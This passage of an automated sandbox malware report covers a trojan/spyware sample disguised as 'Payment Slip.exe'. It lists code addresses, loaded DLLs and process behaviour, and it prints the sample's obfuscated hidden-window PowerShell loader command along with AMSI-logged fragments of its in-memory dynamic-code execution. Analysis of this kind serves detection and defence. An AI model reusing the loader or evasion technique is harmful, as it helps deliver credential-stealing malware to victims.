          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E018187_2_04E01818
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0001F7_2_04E0001F
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0B7E87_2_04E0B7E8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E085E87_2_04E085E8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0E9E87_2_04E0E9E8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E009C37_2_04E009C3
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E09BC87_2_04E09BC8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0CDC87_2_04E0CDC8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E009D07_2_04E009D0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0E3A87_2_04E0E3A8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0B1A87_2_04E0B1A8
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0C7887_2_04E0C788
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E095887_2_04E09588
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E013607_2_04E01360
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0AB687_2_04E0AB68
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0DD687_2_04E0DD68
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0C1487_2_04E0C148
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E08F487_2_04E08F48
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0F3487_2_04E0F348
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0134F7_2_04E0134F
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0D7287_2_04E0D728
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0A5287_2_04E0A528
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0ED087_2_04E0ED08
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E005087_2_04E00508
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E089087_2_04E08908
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E0BB087_2_04E0BB08
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E836F07_2_04E836F0
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E841BC7_2_04E841BC
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E80D887_2_04E80D88
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E814707_2_04E81470
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E81B507_2_04E81B50
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E829207_2_04E82920
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E822387_2_04E82238
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E830087_2_04E83008
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E836E17_2_04E836E1
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E82FFB7_2_04E82FFB
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E808DE7_2_04E808DE
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E8146B7_2_04E8146B
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E809607_2_04E80960
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E80D797_2_04E80D79
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E800407_2_04E80040
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E822297_2_04E82229
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E81B3F7_2_04E81B3F
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E800067_2_04E80006
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E80A107_2_04E80A10
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_04E829117_2_04E82911
          Source: Payment Slip.exeStatic PE information: invalid certificate
          Source: Payment Slip.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
          Source: C:\Users\user\Desktop\Payment Slip.exeFile created: C:\Users\user\AppData\Local\Temp\nsh287F.tmpJump to behavior
          Source: Payment Slip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\Payment Slip.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Payment Slip.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\Payment Slip.exeFile read: C:\Users\user\Desktop\Payment Slip.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Payment Slip.exe "C:\Users\user\Desktop\Payment Slip.exe"
          Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"
          Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Masculinity.exe "C:\Users\user\AppData\Local\Temp\Masculinity.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Binary string: ation.pdb source: powershell.exe, 00000002.00000002.2675557831.0000000006F20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2678804410.00000000080E2000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000002.00000002.2679871550.00000000095F2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Torosity $Politimssigasiliscan $Socialpdagoger), (Ionoxalis163 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:hebrisk = [AppDomain]::CurrentDomain.GetAsse
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Afrormosia)), $Pleurocentesis).DefineDynamicModule($Greenwithe, $false).DefineType($Gwragedd, $Lynche, [System.MulticastDelegate])$Non
          Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
          Source: C:\Users\user\Desktop\Payment Slip.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "Jump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_071CC93B pushfd ; ret 2_2_071CC93C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_071CC926 pushfd ; ret 2_2_071CC927
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_3_0019CA98 pushfd ; retf 0019h7_3_0019CA99
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_3_0019EE18 push eax; iretd 7_3_0019EE65
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_3_0019EE8C push eax; iretd 7_3_0019EEA9
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_3_0019CF4C push eax; iretd 7_3_0019CF4D
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeCode function: 7_2_00159C30 push esp; retf 0017h7_2_00159D55
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Masculinity.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Masculinity.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\Payment Slip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
